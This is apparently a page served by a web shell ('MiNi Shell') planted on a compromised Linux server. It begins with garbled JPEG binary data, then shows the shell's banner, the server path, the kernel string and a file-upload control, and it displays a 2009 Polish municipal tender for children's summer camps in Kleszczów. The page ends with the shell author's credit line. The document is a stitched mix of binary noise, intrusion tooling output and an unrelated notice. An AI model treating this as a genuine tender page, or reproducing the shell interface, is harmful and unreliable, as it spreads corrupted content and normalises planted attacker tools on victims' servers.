JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090327/80906-N-2009.html

<p class="kh_header"><b>Kleszczów: Organizacja wypoczynku krajowego dla dzieci i młodzieży z terenu
gminy Kleszczów w 2009 roku</b><br>
<b>Numer ogłoszenia: 80906 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury w Kleszczowie , ul. Główna 74, 97-410 Kleszczów, woj. łódzkie, tel. 0-44 731 32 30, faks 0-44 731 32 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goksir.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wypoczynku krajowego dla dzieci i młodzieży z terenu
gminy Kleszczów w 2009 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja wypoczynku krajowego dla dzieci 
i młodzieży z terenu Gminy Kleszczów w 2009 roku. Przedmiot zamówienia składa się z 4 części (Część 1, Część 2, Część 3, Część 4):
1)14-dniowy wypoczynek letni dla uczniów szkół podstawowych z klas I-III, dla 64 osób (1 turnus) w okresie między 25.07.2009 roku a 30.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości Władysławowo - ośrodki położone w odległości do 500 metrów od morza). 
2)14-dniowy wypoczynek letni dla uczniów szkół podstawowych z klas IV-VI, dla 112 osób (2 turnusy) w okresie między 25.07.2009 roku a 30.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości Władysławowo - preferowane ośrodki położone w odległości do 500 metrów od morza).
3)14-dniowy wypoczynek letni dla uczniów szkół gimnazjalnych, dla 75 osób (możliwość zorganizowania wypoczynku w 1 lub 2 turnusach) w okresie między 25.07.2009 roku a 30.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości - Hel, preferowane ośrodki położone w odległości do 500 metrów od morza).
4)14-dniowy obóz szkoleniowo-rekreacyjny dla członków Młodzieżowej Orkiestry Dętej Gminy  Kleszczów, dla 40 osób (1 turnus) w okresie między 25.07.2009 roku a 14.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości Władysławowo - ośrodki położone w odległości do 500 metrów od morza). 

Szczegółowy opis w/w części zawiera Specyfikacja Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 25.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości:
Część 1 -1500,00 zł (słownie: jeden tysiąc pięćset złotych)
Część 2 -1500,00 zł (słownie: jeden tysiąc pięćset złotych)
Część 3 -1500,00 zł (słownie: jeden tysiąc pięćset złotych) 
Część 4 -1500,00 zł (słownie: jeden tysiąc pięćset złotych)
			
W przypadku składania oferty na kilka części powyższe kwoty należy odpowiednio zsumować<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności;
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
2.1.Posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia poprzez wykazanie się należytym zrealizowaniem w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej dwóch usług odpowiadających rodzajem (wypoczynek letni zorganizowany dla minimum 50 osób) przedmiotowi zamówienia.    
2.2. Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia posiadającymi odpowiednie kwalifikacje zawodowe i doświadczenie. 
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia;
3.1.Wykonawca winien wykazać się informacją banku lub spółdzielczej kasy
oszczędnościowo-kredytowej, w którym posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę:
1.	Minimum 50 000 zł w części 1
2.	Minimum 50 000 zł w części 2
3.	Minimum 50 000 zł w części 3
4.	Minimum 50 000 zł w części 4
W przypadku składania oferty na kilka części powyższe kwoty należy odpowiednio zsumować.
3.2. Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4.Niepodlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych;
5. Spełniają warunki określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. Nr 12 poz. 67).

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:

A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

A.1)Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 SIWZ.
A.2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.3)Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
A.4)Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem publicznym.
A.5)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
A.6)Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
A.7)Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
A.8)Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 SIWZ.
B.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
B.1) wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu Zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez nich czynności oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował. Obowiązkowo należy załączyć dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (z wyłączeniem osób przydzielonych przez zamawiającego w części 1 i 4). Wzór wykazu stanowi załącznik nr 3 SIWZ.

B.2)wykaz wykonanych w okresie ostatnich trzech lat usług przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających przedmiotowi zamówienia. Wykaz winien zawierać przynajmniej dwie usługi odpowiadające zakresem (wypoczynek letni zorganizowany dla minimum 50 osób) przedmiotowi zamówienia. Wzór wykazu stanowi załącznik nr 4 SIWZ.
Do wykazu obowiązkowo należy załączyć dokumenty potwierdzające należyte wykonanie usług np. referencje zleceniodawców tych usług.

C.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
C.1) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę:
C.1.1. Minimum 50 000 zł w części 1
C.1.2  Minimum 50 000 zł w części 2
C.1.3  Minimum 50 000 zł w części 3
C.1.4  Minimum 50 000 zł w części 4

W przypadku składania oferty na kilka części powyższe kwoty należy odpowiednio zsumować.

C.2)Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

D.W celu potwierdzenia, że oferowane usługi spełniają warunek określony w Rozporządzeniu Ministra Edukacji  Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ( Dz. U. z 1997 r. Nr 12 poz. 67), należy załączyć:

D.1)Oświadczenie wykonawcy o spełnieniu w/w warunku z wykorzystaniem wzoru  
-załącznik nr 2 SIWZ.
 
E.W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 

E.1) Zdjęcia /fotografie w formie papierowej/ przedstawiające miejsca i warunki wypoczynku, obowiązkowo należy dołączyć zdjęcia pokoi, w których będą zakwaterowani uczestnicy wypoczynku, zdjęcie łazienki oraz opis oferowanego miejsca i warunków wypoczynku.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego- spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. 

A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

A.1)Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 SIWZ.
A.2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.3)Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
A.4)Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem publicznym.
A.5)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
A.6)Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
A.7) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
A.8)Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 SIWZ.

B.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:  
B.1)wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu Zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez nich czynności oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował. Obowiązkowo należy załączyć dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (z wyłączeniem osób przydzielonych przez zamawiającego w części 1 i 4). Wzór wykazu stanowi załącznik nr 3 SIWZ.
B.2)wykaz wykonanych w okresie ostatnich trzech lat usług przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających przedmiotowi zamówienia. Wykaz winien zawierać przynajmniej dwie usługi odpowiadające zakresem (wypoczynek letni zorganizowany dla minimum 50 osób) przedmiotowi zamówienia. Wzór wykazu stanowi załącznik nr 4 SIWZ. Do wykazu obowiązkowo należy załączyć dokumenty potwierdzające należyte wykonanie usług np. referencje zleceniodawców tych usług.

C.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:

C.1)Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę:
C.1.1. Minimum 50 000 zł w części 1
C.1.2  Minimum 50 000 zł w części 2
C.1.3  Minimum 50 000 zł w części 3
C.1.4  Minimum 50 000 zł w części 4

W przypadku składania oferty na kilka części powyższe kwoty należy odpowiednio zsumować.

C.2)Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

D.W celu potwierdzenia, że oferowane usługi spełniają warunek określony w Rozporządzeniu Ministra Edukacji  Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania ( Dz. U. z 1997 r. Nr 12 poz. 67), należy załączyć:

D.1)Oświadczenie wykonawcy o spełnieniu w/w warunku z wykorzystaniem wzoru    - załącznik nr 2 SIWZ.
 
E.W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 

E.1) Zdjęcia /fotografie w formie papierowej/ przedstawiające miejsca i warunki wypoczynku, obowiązkowo należy dołączyć zdjęcia pokoi, w których będą zakwaterowani uczestnicy wypoczynku, zdjęcie łazienki oraz opis oferowanego miejsca i warunków wypoczynku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Atrakcyjność programu, miejsca wypoczynku oraz miejsca zakwaterowania - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.goksir.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Kultury w Kleszczowie, ul. Główna 74, 97-410 Kleszczów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego: Gminny Ośrodek Kultury 
w Kleszczowie, ul. Główna 74, 97-410 Kleszczów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 14-dniowy wypoczynek letni dla uczniów szkół podstawowych z klas I-III..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy wypoczynek letni dla uczniów szkół podstawowych z klas I-III, dla 64 osób (1 turnus) w okresie między 25.07.2009 roku a 30.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości Władysławowo - ośrodki położone w odległości do 500 metrów od morza)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Atrakcyjność programu, miejsca wypoczynku oraz miejsca zakwaterowania - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 14-dniowy wypoczynek letni dla uczniów szkół podstawowych z klas IV-VI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy wypoczynek letni dla uczniów szkół podstawowych z klas IV-VI, dla 112 osób (2 turnusy) w okresie między 25.07.2009 roku a 30.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości Władysławowo - preferowane ośrodki położone w odległości do 500 metrów od morza)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Atrakcyjność programu, miejsca wypoczynku oraz miejsca zakwaterowania - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 14-dniowy wypoczynek letni dla uczniów szkół gimnazjalnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy wypoczynek letni dla uczniów szkół gimnazjalnych, dla 75 osób (możliwość zorganizowania wypoczynku w 1 lub 2 turnusach) w okresie między 25.07.2009 roku a 30.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości - Hel, preferowane ośrodki położone w odległości do 500 metrów od morza)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Atrakcyjność programu, miejsca wypoczynku oraz miejsca zakwaterowania - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 14-dniowy obóz szkoleniowo-rekreacyjny dla członków Młodzieżowej Orkiestry Dętej Gminy  Kleszczów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy obóz szkoleniowo-rekreacyjny dla członków Młodzieżowej Orkiestry Dętej Gminy  Kleszczów, dla 40 osób (1 turnus) w okresie między 25.07.2009 roku a 14.08.2009 roku (należy podać konkretny termin wypoczynku) nad Morzem Bałtyckim (od miejscowości Międzyzdroje do miejscowości Władysławowo - ośrodki położone w odległości do 500 metrów od morza)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Atrakcyjność programu, miejsca wypoczynku oraz miejsca zakwaterowania - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com